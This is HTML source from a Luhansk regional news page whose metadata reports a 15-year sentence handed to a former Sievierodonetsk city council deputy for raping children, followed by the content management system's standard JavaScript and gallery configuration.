<meta property="og:description" content="Северодонецкий городской суд Луганской области приговорил к 15 годам лишения свободы бывшего депутата Северодонецкого городского совета за совершение изнасилования несовершеннолетних и малолетних детей. Как сообщает со ссылкой пресс-служба прокуратуры Луганской области, Северодонецким городским">
<link rel="search" type="application/opensearchdescription+xml" href="http://www.citynews.net.ua/index.php?do=opensearch" title="Новости Луганска и Луганской области. Луганские новости сегодня">
<link rel="canonical" href="http://www.citynews.net.ua/news/83977-v-severodonecke-deputata-pedofila-prigovorili-k-15-godam-tjurmy.html">
<link rel="alternate" type="application/rss+xml" title="Новости Луганска и Луганской области. Луганские новости сегодня" href="http://www.citynews.net.ua/rss.xml">
<link href="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/editor/css/default.css&amp;v=25" rel="stylesheet" type="text/css">
<script src="/engine/classes/min/index.php?charset=utf-8&amp;g=general&amp;v=25"></script>
<script src="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/classes/js/jqueryui.js,engine/classes/js/dle_js.js,engine/classes/highslide/highslide.js&amp;v=25" defer></script>
<script>
<!--
var dle_root       = '/';
var dle_admin      = '';
var dle_login_hash = 'd5acbb30b3f3e4eafad0bc3dcca6741c053ac0ec';
var dle_group      = 5;
var dle_skin       = 'v2';
var dle_wysiwyg    = '2';
var quick_wysiwyg  = '0';
var dle_act_lang   = ["Да", "Нет", "Ввод", "Отмена", "Сохранить", "Удалить", "Загрузка. Пожалуйста, подождите..."];
var menu_short     = 'Быстрое редактирование';
var menu_full      = 'Полное редактирование';
var menu_profile   = 'Просмотр профиля';
var menu_send      = 'Отправить сообщение';
var menu_uedit     = 'Админцентр';
var dle_info       = 'Информация';
var dle_confirm    = 'Подтверждение';
var dle_prompt     = 'Ввод информации';
var dle_req_field  = 'Заполните все необходимые поля';
var dle_del_agree  = 'Вы действительно хотите удалить? Данное действие невозможно будет отменить';
var dle_spam_agree = 'Вы действительно хотите отметить пользователя как спамера? Это приведёт к удалению всех его комментариев';
var dle_complaint  = 'Укажите текст Вашей жалобы для администрации:';
var dle_big_text   = 'Выделен слишком большой участок текста.';
var dle_orfo_title = 'Укажите комментарий для администрации к найденной ошибке на странице';
var dle_p_send     = 'Отправить';
var dle_p_send_ok  = 'Уведомление успешно отправлено';
var dle_save_ok    = 'Изменения успешно сохранены. Обновить страницу?';
var dle_reply_title= 'Ответ на комментарий';
var dle_tree_comm  = '0';
var dle_del_news   = 'Удалить статью';
var dle_sub_agree  = 'Вы действительно хотите подписаться на комментарии к данной публикации?';
var allow_dle_delete_news   = false;

jQuery(function($){

hs.graphicsDir = '/engine/classes/highslide/graphics/';
hs.wrapperClassName = 'rounded-white';
hs.outlineType = 'rounded-white';
hs.numberOfImagesToPreload = 0;
hs.captionEval = 'this.thumb.alt';
hs.showCredits = false;
hs.align = 'center';
hs.transitions = ['expand', 'crossfade'];

hs.lang = { loadingText : 'Загрузка...', playTitle : 'Просмотр слайдшоу (пробел)', pauseTitle:'Пауза', previousTitle : 'Предыдущее изображение', nextTitle :'Следующее изображение',moveTitle :'Переместить', closeTitle :'Закрыть (Esc)',fullExpandTitle:'Развернуть до полного размера',restoreTitle:'Кликните для закрытия картинки, нажмите и удерживайте для перемещения',focusTitle:'Сфокусировать',loadingTitle:'Нажмите для отмены'
};
hs.slideshowGroup='fullnews'; hs.addSlideshow({slideshowGroup: 'fullnews', interval: 4000, repeat: false, useControls: true, fixedControls: 'fit', overlayOptions: { opacity: .75, position: 'bottom center', hideOnMouseOut: true } });

});
//-->
</script>
</body>
</html>
<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->
